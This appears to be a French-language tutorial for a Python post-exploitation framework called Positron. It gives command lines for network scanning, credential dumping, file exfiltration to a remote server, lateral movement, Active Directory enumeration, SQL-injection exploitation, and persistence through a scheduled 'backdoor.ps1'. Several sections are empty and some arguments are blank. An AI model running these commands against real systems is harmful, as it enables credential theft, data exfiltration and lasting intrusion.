⚛️ Positron - Guide Exhaustif

Positron est un framework de post-exploitation écrit en Python, conçu pour automatiser les tâches d'exploitation, d'analyse et d'exfiltration dans des environnements sécurisés. Ce guide couvre chaque étape, des bases aux fonctionnalités avancées. 🚀

1️⃣ Pré-requis

2️⃣ Installation de Positron

Étape 1 : Télécharger Positron

Clonez le dépôt GitHub officiel :

git clone https://github.com/PositronFramework/positron.git

Accédez au répertoire :

cd positron

Étape 2 : Installer les Dépendances

Installez les bibliothèques nécessaires :


sudo apt update
sudo apt install python3 python3-pip -y
pip3 install -r requirements.txt
            

Étape 3 : Tester l’Outil

Assurez-vous que Positron est fonctionnel :

python3 positron.py --help

Vous devriez voir une liste des commandes disponibles.

3️⃣ Configuration de Positron

Connexion à une Cible

Positron peut se connecter à une cible via SSH, RDP, ou une session déjà compromise :


python3 positron.py --target  --user  --password 
            

Configuration des Modules

Personnalisez les modules actifs dans le fichier de configuration :

config/positron_modules.json

Exemple de module activé :


{
    "module": "network_scan",
    "enabled": true,
    "options": {
        "range": "192.168.1.0/24",
        "output": "/results/network_scan.json"
    }
}
            

4️⃣ Fonctionnalités de Base

Analyse Réseau

Scannez les ports ouverts sur le réseau local :


python3 positron.py --module network_scan --range 192.168.1.0/24
            

Exfiltration de Fichiers

Récupérez des fichiers sensibles depuis la cible :


python3 positron.py --module file_exfil --target "C:\Users\Public\Documents"
            

Dump de Mots de Passe

Utilisez un module intégré pour extraire les mots de passe :


python3 positron.py --module creds_dump
            

5️⃣ Fonctionnalités Avancées

Déplacement Latéral

Pivotez vers une autre machine sur le réseau :


python3 positron.py --module lateral_movement --target  --user  --password 
            

Reconnaissance Active Directory

Cartographiez les relations dans un environnement AD :


python3 positron.py --module ad_enum
            

Persistance

Ajoutez une tâche planifiée pour exécuter un script malveillant au démarrage :


python3 positron.py --module persistence --script backdoor.ps1
            

6️⃣ Scénarios Pratiques

Scénario 1 : Analyse Réseau et Découverte de Services

Identifiez les machines actives et les services exposés :


python3 positron.py --module network_scan --range 10.0.0.0/16
            

Scénario 2 : Dump des Credentials

Récupérez les credentials locaux et distants :


python3 positron.py --module creds_dump
            

Scénario 3 : Exfiltration Discrète

Utilisez une technique furtive pour envoyer les fichiers collectés vers un serveur distant :


python3 positron.py --module file_exfil --target "C:\Users\Admin\Documents" --upload 
            

Scénario 4 : Exploitation d'une Application Web

Utilisez le module web_exploit pour détecter et exploiter une faille :


python3 positron.py --module web_exploit --url "http://cible.com" --payload "sql_injection"
            

7️⃣ Automatisation et Intégration

Automatisation des Tâches

Créez un script pour exécuter plusieurs modules en chaîne :


#!/bin/bash
python3 positron.py --module network_scan --range 192.168.1.0/24
python3 positron.py --module creds_dump
python3 positron.py --module file_exfil --target "C:\sensitive_files"
            

Intégration avec Splunk

Envoyez les logs générés par Positron à Splunk pour une analyse avancée :


splunk add monitor /path/to/positron_logs --sourcetype positron
            

8️⃣ Conseils et Bonnes Pratiques

9️⃣ Rappels Légaux et Éthiques

⚠️ Avertissement : Positron est un outil réservé aux tests légaux et autorisés. Toute utilisation abusive est strictement interdite.